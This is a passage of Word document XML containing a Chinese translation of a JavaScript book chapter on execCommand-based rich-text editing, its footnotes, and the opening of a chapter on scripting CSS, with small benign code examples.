        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>execComman</w:t>
      </w:r>
      <w:r>
        <w:t>d()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。（注意，这是</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>的方法，而不是设置了</w:t>
      </w:r>
      <w:r>
        <w:t>contenteditable</w:t>
      </w:r>
      <w:r>
        <w:t>属性的元素的方法。如果文档中有多个可编辑的元素，命令将自动应用到选区或插入光标所在那个元素上。）用</w:t>
      </w:r>
      <w:r>
        <w:t>execCommand()</w:t>
      </w:r>
      <w:r>
        <w:t>执行的命令名字都是如</w:t>
      </w:r>
      <w:r>
        <w:t>"bold"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"subscript"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"justifycenter"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"insertimage"</w:t>
      </w:r>
      <w:r>
        <w:t>之类的字符串。命令名是</w:t>
      </w:r>
      <w:r>
        <w:t>execCommand()</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个参数。有些命令还需要一个值参数</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>例如，</w:t>
      </w:r>
      <w:r>
        <w:t>"createlink"</w:t>
      </w:r>
      <w:r>
        <w:t>需要一个超级链接</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。理论上，如果</w:t>
      </w:r>
      <w:r>
        <w:t>execCommand()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，浏览器</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>会自动提示用户输入所需值。但为了提高可移植性，你应该提示用户输入，并传递</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>作为第二参数，传递用户输入的值作为第三个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function bold(){document.execCommand("bold",false,url);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function link(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var url=prompt("Enter link destination");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(url)document.execCommand("createlink",false,url);</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execCommand()</w:t>
      </w:r>
      <w:r>
        <w:t>所支持的命令通常是由工具栏上的按钮触发的。当要触发的命令不可用时，良好的</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>会使对应的按钮无效。可以给</w:t>
      </w:r>
      <w:r>
        <w:t>document.queryCommandSupport()</w:t>
      </w:r>
      <w:r>
        <w:t>传递命令名来查询浏览器是否支持该命令。调用</w:t>
      </w:r>
      <w:r>
        <w:t>document.queryCommandEnabled()</w:t>
      </w:r>
      <w:r>
        <w:t>来查询当前所使用的命令。（例如，一条需要文本选择区域的命令在无选区的情况下有可能是无效的。）有一些命令如</w:t>
      </w:r>
      <w:r>
        <w:t>"bold"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"italic"</w:t>
      </w:r>
      <w:r>
        <w:t>有一个布尔值状态，开或关取决于当前选区或光标的位置。这些命令通常用工具栏上的开关按钮表示</w:t>
      </w:r>
      <w:r>
        <w:t>。要判定这些命令的当前状态可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>document.queryCommandState()</w:t>
      </w:r>
      <w:r>
        <w:t>。最后，有些命令（如</w:t>
      </w:r>
      <w:r>
        <w:t>"fontname"</w:t>
      </w:r>
      <w:r>
        <w:t>）有一个相关联的值（字体系列名）。用</w:t>
      </w:r>
      <w:r>
        <w:t>document.queryCommandValue()</w:t>
      </w:r>
      <w:r>
        <w:t>查询该值。如果当前选取的文本使用了两种不同的字体，</w:t>
      </w:r>
      <w:r>
        <w:t>"fontn</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ame"</w:t>
      </w:r>
      <w:r>
        <w:t>的查询结果是不确定的。使用</w:t>
      </w:r>
      <w:r>
        <w:t>document.queryCommandIndeterm()</w:t>
      </w:r>
      <w:r>
        <w:t>来检测这种情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不同的浏览器实现了不同的编辑命令组合。只有一少部分命令得到了很好的支持，如</w:t>
      </w:r>
      <w:r>
        <w:t>"bold"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"italic"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"cre</w:t>
      </w:r>
      <w:r>
        <w:t>atelink"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"undo"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"redo"</w:t>
      </w:r>
      <w:r>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>。在写本书这段时间里</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>草案定义了以下命令。但由于它们并没有被普遍地支持，这里就不做详细的文档记录：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2652622" cy="862641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="31" name="00031.jpeg" descr="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00031.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2652622" cy="862641"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序需要富文本编辑器功能，很可能需要采纳一个预先构建的解决浏览器之间的各种差异的解决方案。在网上可以找到很多这样的编辑器组件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>。值得注意的是，浏览器内置的编辑功能对用户输入少量的富文本来说是足够强大了，但要解决所有种类的文档的编辑来说还是过于简陋了。特别要注意，这些编辑器生成的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标记很可能是杂乱无章的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一旦用户编辑了某</w:t>
      </w:r>
      <w:r>
        <w:t>元素的内容，该元素设置了</w:t>
      </w:r>
      <w:r>
        <w:t>conteneditable</w:t>
      </w:r>
      <w:r>
        <w:t>属性，就可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性得到已编辑内容的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标记。如何处理该富文本由你自己决定。可以把它存储在隐藏的表单字段中，并通过提交该表单把它发送到服务器。可以使用第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章描述的技术</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>直接把已编辑文本发送到服务器。或者使用第</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>章的技术在本地保存用户的编辑文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>选择器规范：</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.w3.org/TR/css3-selectors/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>选择器</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>标准不是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分，但与之有紧密的关联。见</w:t>
      </w:r>
      <w:r>
        <w:t>http://ww</w:t>
      </w:r>
      <w:r>
        <w:t>w.w3.org/TR/selectors-api/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>Sizzle</w:t>
      </w:r>
      <w:r>
        <w:t>独立版本参见</w:t>
      </w:r>
      <w:r>
        <w:t>http://sizzlejs.com</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.w3.org/TR/ElementTraversal</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLDocument</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>的可扩展属性，但不支持</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>更具体的子类型的可扩展的属性。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>互操作命令列表，请参见</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.quirksmode.org/dom/execC</w:t>
      </w:r>
      <w:r>
        <w:t>ommand.html</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>YUI</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Dojo</w:t>
      </w:r>
      <w:r>
        <w:t>框架包含了编辑器组件。这里也有一些其他的可选方案</w:t>
      </w:r>
      <w:r>
        <w:t>http://en.wikipedia.org/wiki/Online_rich-text_editor</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="398" w:name="Di_16Zhang__Jiao_Ben_Hua_CSS____Ceng_Die"/>
      <w:bookmarkStart w:id="399" w:name="Di_16Zhang__Jiao_Ben_Hua_CSS"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章　脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="398"/>
      <w:bookmarkEnd w:id="399"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>层叠样式表（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cascading Style </w:t>
      </w:r>
      <w:r>
        <w:t>Sheet</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>）是一种指定</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档视觉表现的标准。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的本意是想让视觉设计师来使用的：它允许设计师精确地指定文档元素的字体、颜色、外边距、缩进、边框，甚至是定位。不过，客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员对</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>也非常感兴趣是因为样式可以通过脚本编程。脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>启用了一系列有趣的视觉效果，例如：可以创建一个动画让文档内容从右侧</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>滑入</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>；也能创建一个轮廓伸缩的列表，在里面用户自己控制显示的信息量。首次推出类似的脚本化视觉效果是革命性的。创造这些效果的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>技术以前统称为动态</w:t>
      </w:r>
      <w:r>
        <w:t>HTM</w:t>
      </w:r>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>DHTML</w:t>
      </w:r>
      <w:r>
        <w:t>），而现在，这个术语已经不再流行了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>是个复杂的标准，在写本书时它仍在活跃的开发中。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>本身可以写一本书，而详细介绍它则超出了本书的范围</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>。但是为了理解</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>脚本化，我们必须熟悉</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>基础和最常用的样式属性。本章开头简介</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>概况，接着解释了一些关键样式，它们最合适脚本化了。此后，</w:t>
      </w:r>
      <w:r>
        <w:t>16.3</w:t>
      </w:r>
      <w:r>
        <w:t>节阐述怎样实现</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>脚本化。</w:t>
      </w:r>
      <w:r>
        <w:t>16.3</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍最常用和重要的技术：利用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性值，更改那些应用在单个文档元素中的样式。元素的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以用来设置样式，但是它不适</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>合用来查询样式。</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>6.4</w:t>
      </w:r>
      <w:r>
        <w:t>节阐述如何查询元素的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>计算样式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>16.5</w:t>
      </w:r>
      <w:r>
        <w:t>节阐述如何通过修改元素的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性一次修改元素的多个样式。直接操作样式表也是可能的，但不太常见，</w:t>
      </w:r>
      <w:r>
        <w:t>16.6</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍如何开启或关闭样式表、修改已存在样式表的规则以及添加新的样式表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="400" w:name="16_1_CSSGai_Lan_"/>
      <w:r>
        <w:t>16.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>概览</w:t>
      </w:r>
      <w:bookmarkEnd w:id="400"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的视觉显示包含很多变量：字体、颜色、间距等。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>标准列举了这些变量，我们称为样式属性。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>定义了这些属性以指定字体、颜色、外边距、边框、背景图片、文本对齐方式、元素尺寸和元素位置。为了定义</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的视觉表现，规定了这些</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。为此，紧</w:t>
      </w:r>
      <w:r>
        <w:t>跟着属性名是冒号和值，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>font-weight:bold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了全面地描述一个元素的视觉表现，通常需要指定不止一个属性。当需要多个名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对时，它们之间用分号隔开：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>margin-left:10%;/*</w:t>
      </w:r>
      <w:r>
        <w:t>左外边距是页面宽度的</w:t>
      </w:r>
      <w:r>
        <w:t>10%*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text-indent:.5in;/*1/2</w:t>
      </w:r>
      <w:r>
        <w:t>英寸缩进</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>font-size:12pt;/*</w:t>
      </w:r>
      <w:r>
        <w:t>字体尺寸</w:t>
      </w:r>
      <w:r>
        <w:t>12pt*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如你所见，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>忽略了</w:t>
      </w:r>
      <w:r>
        <w:t>“/*”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“*/”</w:t>
      </w:r>
      <w:r>
        <w:t>之间的注释，但是它不支持</w:t>
      </w:r>
      <w:r>
        <w:t>“//”</w:t>
      </w:r>
      <w:r>
        <w:t>后面的注释。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有两种方式将一组定义视觉表现的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性和对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素关联在一起。第一种是通过给每个单独的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素设置</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性值的方式，称为内联样式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p style="margin:20px;border:solid red 2px;"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This paragraph has increased margins and is surrounded by a rectangular red border.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管如此，通常将单独的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素与</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式分开并把它们定义在一个样式表（</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>sheet</w:t>
      </w:r>
      <w:r>
        <w:t>）中会更有用。样式表通过选择器将一组样式属性和使用选择器（</w:t>
      </w:r>
      <w:r>
